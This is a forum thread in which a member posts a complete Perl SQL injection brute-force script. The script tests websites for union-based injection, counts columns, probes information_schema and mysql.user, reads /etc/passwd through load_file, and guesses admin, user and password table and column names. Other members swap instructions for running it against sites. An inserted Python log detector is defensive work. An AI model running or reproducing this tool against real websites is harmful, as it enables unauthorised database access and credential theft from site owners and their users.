ZeroCold Posted February 24, 2012 Report Posted February 24, 2012 #!/usr/bin/perluse LWP::Simple;if(!$ARGV[2]){print "\n\n[+] SQL Injection bruteforce By Bl4k3 -[+]-\n=========================================";print "\n\nUse: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]\n";print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limit of columns to check\n[FILE]: File where save the results\n[COMMENT]: '/*' o '--' (Without '') (Optional)\n[-T]: Try to brute force tables (Optional)\n[-C]: Try to brute force columns (Optional)\n[-NOCHECK]: Skip the initial check (Optional)\n\n";exit (0);}@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator','administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names','member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors','asociado','asociados','autores','membername','autor','autores','Users','Admin'
,'Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');@nombrecolumna=('admin_name','log_utenti','cla_adm','usu_adm', 'sanleo','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author','sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');if ( $ARGV[0] !~ /^http:/ ){$ARGV[0] = "http://" . $ARGV[0];}if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--"){$cmn.= "+";$cfin.="--";print "\n[+] Comments to use: '--' & '+'";}else{$cmn.= "/**/";$cfin.= "/*";print "\n[+] Comments to use: '/*' & '/**/'";}open(WEB,">>".$ARGV[2]) || die "\n\n[-] Failed creating the file\n";if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK"){print "\n[!] Skipping the initial check...\n";print WEB "[WEBSITE]:\n\n$ARGV[0]\n";}else{print "\n[!] 
Checking if the website is vulnerable...\n";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;$response=get($sql)or die("[-] Wrong Website, check it\n");if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /SELECT * FROM/ || $response =~/ / || $response =~ /Mysql Error/ || $response =~ /Mysql Error./ || $response =~ /Incorrect syntax near/ || $response =~ /[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect/ || $response =~ /Microsoft OLE DB Provider for SQL Server/){print "[+] Vulnerable website, script continues...\n";print WEB "[WEBSITE]:\n\n$ARGV[0]\n";}else{print "[-] Website apparently not vulnerable to SQL Inyection, try another comment\n\n";exit(1);}}print "\n[!] Looking up columns...\n";for ($column = 0 ; $column < $ARGV[1] ; $column ++){$union.=','.$column;$inyection.=','."0x6c6f67696e70776e7a";if ($column == 0){print WEB "\n[COLUMNS]:\n\n";$inyection = '';$union = '';}$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;$response=get($sql)or die("[-] Failed to try to find the number of columns, check website\n");if($response =~ /loginpwnz/){$column ++;print "[+] The site has $column columns\n\n";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;print "$sql\n";print WEB "$sql\n";print "\n[!] 
Checking if Information_Schema exists...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;$response=get($sql)or die("[-] Impossible to get Information_Schema\n");if($response =~ /loginpwnz/){print "\n[+] Information_Schema available...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";}else{print "\n[-] Information_Schema unavailable";}print "\n[!] Checking if MySQL.User exists...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;$response=get($sql)or die("[-] Impossible to get MySQL.User\n");if($response =~ /loginpwnz/){print "\n[+] MySQL.User available...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";}else{print "\n[-] MySQL.User unavailable";}while ($loadcont < $column-1){$loadfile.=','.'load_file(0x2f6574632f706173737764)';$loadcont++;}print "\n[!] Checking if it is possible to inject LOAD_FILE...";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;$response=get($sql)or die("[-] Imposible inyectar LOAD_FILE\n");if($response =~ /root:x:/){print "\n[+] LOAD_FILE available...saving in $ARGV[2]";print WEB "\n\n[LOAD_FILE]:\n\nload_file(0x2f6574632f706173737764) => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";}else{print "\n[-] LOAD_FILE unavailable";}if ($ARGV[3] =~ "-T" || $ARGV[4] =~ "-T" || $ARGV[5] =~ "-T" || $ARGV[6] =~ "-T"){print "\n\n[!] 
Brute forcing tables...";print WEB "\n\n[TABLES]:\n\n";foreach $tabla(@nombretabla){chomp($tabla);$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;$response=get($sql)or die("[-] Impossible to get tables\n");if($response =~ /loginpwnz/){print "\n[+] Table $tabla exists...saving in $ARGV[2]";$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;print WEB "$sql\n";}}}if ($ARGV[3] =~ "-C" || $ARGV[4] =~ "-C" || $ARGV[5] =~ "-C" || $ARGV[6] =~ "-C"){print "\n\n[!] Table to brute force columns: ";$tabla.='';chomp($tabla);print WEB "\n\n[COLUMNS IN TABLE $tabla]:\n\n";foreach $columna(@nombrecolumna){chomp($columna);$sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;$response=get($sql)or die("[-] Impossible to get columns\n");if ($response =~ /loginpwnz/){print "\n[+] Column $columna available...saving in $ARGV[2]";print WEB "$columna\n";}}}print WEB "\n\n\n[*EOF*]";print "\n\n[+] Everything saved correctly in $ARGV[2]\n\n";print "## c0ded by Bl4k3 | 2010 ##\n\n";exit (0);}}print "[-] Impossible to find number of columns, try more columns\n\n";print "## c0ded by Bl4k3 , WyattLW | 2010 ##\n\n";exit (0); Quote
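Seen from the defending side, the script posted above leaves a fixed fingerprint in web server access logs. The following is an added example, not part of the original post or of the script: a log detector built only from the constants visible in that script. It assumes Apache combined-style log lines; the function names, the sample lines and the client addresses (documentation ranges) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

MARKER = "0x6c6f67696e70776e7a"  # hex of "loginpwnz", the string the script greps for
LOAD_FILE = "load_file(0x2f6574632f706173737764)"  # hex of /etc/passwd, as in the script
SEP = r"(?:/\*\*/|\s+)"  # the script joins keywords with "/**/" or "+" (a space once decoded)
UNION_RE = re.compile(rf"-1{SEP}union{SEP}select", re.I)
FROM_RE = re.compile(rf"{SEP}from{SEP}([\w.]+)", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')

def longest_run(counts):
    """Length of the longest stretch where each value is the previous one plus 1."""
    best = run = 1 if counts else 0
    for a, b in zip(counts, counts[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best

def analyse(lines, min_sweep=3):
    """Per client IP: indicators seen, table names probed, length of the column sweep."""
    seen = defaultdict(lambda: {"indicators": set(), "tables": [], "counts": []})
    for line in lines:
        m = LOG_RE.match(line)
        query = unquote_plus(m.group(2)).lower() if m else ""
        if not UNION_RE.search(query):
            continue
        c = seen[m.group(1)]
        n, table = query.count(MARKER), FROM_RE.search(query)
        hits = {"union-probe": True, "echo-marker": n, "load_file-passwd": LOAD_FILE in query}
        c["indicators"].update(k for k, v in hits.items() if v)
        if table:
            c["tables"].append(table.group(1))  # table-name guess or schema probe
        elif n:
            c["counts"].append(n)  # marker repeated once per guessed column
    for c in seen.values():
        c["sweep"] = longest_run(c.pop("counts"))
        if c["sweep"] >= min_sweep:
            c["indicators"].add("column-sweep")
    return dict(seen)

def _line(ip, q):  # constructed sample line in Apache combined-log style
    return f'{ip} - - [24/Feb/2012:10:00:00 +0000] "GET /index.php?id={q} HTTP/1.1" 200 512'

M3 = ",".join([MARKER] * 3)  # constructed: marker repeated for three guessed columns
SAMPLE_LOG = [_line("203.0.113.7", f"-1+union+select+{q}--") for q in (
    MARKER, f"{MARKER},{MARKER}", M3, f"{M3}+from+information_schema.tables",
    f"{M3}+from+admin", ",".join([LOAD_FILE] * 3))] + [_line("198.51.100.20", "42")]
```

`analyse(SAMPLE_LOG)` reports only the probing client; the ordinary `id=42` request never matches. The detector shows that the sweep was run, while parameterised queries on the application side are what remove the injection point it probes for.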
daNNy.bv Posted February 26, 2012
I would also be glad if the scripts / programs that get posted were described in more detail.... Not all of us have advanced knowledge, and I think it would be nice if we newer members could understand all of this too. Please don't take this the wrong way and come back with remarks like: the frog test, the registration test. Thank you
ZeroCold Posted February 27, 2012 (Author)
> I would also be glad if the scripts / programs that get posted were described in more detail.... Not all of us have advanced knowledge, and I think it would be nice if we newer members could understand all of this too. Please don't take this the wrong way and come back with remarks like: the frog test, the registration test. Thank you
I can't write a presentation for every program I post; it's a waste of time.
- SQL injection
- Brute Force Attack
Nobody is going to explain anything to you as if you were in first grade; you rarely find people who have the patience and the time for you. If you want to learn, you learn on your own.
daNNy.bv Posted February 28, 2012
I know the two terms, but how is the code used?
Guest Kovalski Posted February 28, 2012
It's a Perl script. Copy that code, run vi exemplu.pl, press i, paste the code, press ESC, type :wq, after which:
[+] SQL Injection bruteforce By Bl4k3 -[+]-
=========================================
Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]
[WEBSITE]: Website Design | Small Business Web Design | Web.com
[COLUMNS]: Limit of columns to check
[FILE]: File where save the results
[COMMENT]: '/*' o '--' (Without '') (Optional)
[-T]: Try to brute force tables (Optional)
[-C]: Try to brute force columns (Optional)
[-NOCHECK]: Skip the initial check (Optional)
pr00f Posted February 28, 2012
> I know the two terms, but how is the code used?
You create a .pl file and run it with "perl script.pl". It prints its arguments itself.
$ perl plm.pl hxxp://exemplu.ro/index.php?id= 20 res.txt -- -T -C
[+] Comments to use: '--' & '+'
[!] Checking if the website is vulnerable...
Undefined subroutine &main::get called at plm.pl line 61.
Line 61 tells me nothing.
speeddemon Posted February 29, 2012
> It's a Perl script. Copy that code, run vi exemplu.pl, press i, paste the code, press ESC, type :wq, after which:
> [+] SQL Injection bruteforce By Bl4k3 -[+]-
> =========================================
> Use: perl exemplu.pl [WEBSITE] [COLUMNS] [FILE] [COMMENT] [-T] [-C] [-NOCHECK]
> [WEBSITE]: Website Design | Small Business Web Design | Web.com
> [COLUMNS]: Limit of columns to check
> [FILE]: File where save the results
> [COMMENT]: '/*' o '--' (Without '') (Optional)
> [-T]: Try to brute force tables (Optional)
> [-C]: Try to brute force columns (Optional)
> [-NOCHECK]: Skip the initial check (Optional)
I understood everything...
ZeroCold Posted March 2, 2012 (Author) (edited)
> I know the two terms, but how is the code used?
Mini-tutorial Perl/Tk
@ps-axl, imagine that the script above is the first Perl script you have ever seen, and that this is the first time you have heard of Perl. Read what you wrote:
> It's a Perl script. Copy that code, run vi exemplu.pl, press i, paste the code, press ESC, type :wq, after which (...)
Do you understand anything?
Edited March 2, 2012 by ZeroCold
mrjasdf Posted March 2, 2012
How is this different from schemafuzz or darkmysqli? Ah... this one is in Perl o.O
u0m3 Posted March 3, 2012
> I would also be glad if the scripts / programs that get posted were described in more detail.... Not all of us have advanced knowledge, and I think it would be nice if we newer members could understand all of this too. Please don't take this the wrong way and come back with remarks like: the frog test, the registration test. Thank you
As requested: [Perl] sqli_brute.pl - Pastebin.com
Emisary Posted March 3, 2012
Perl closes immediately after opening the file; I only have problems with this file, others that I made myself work... any ideas?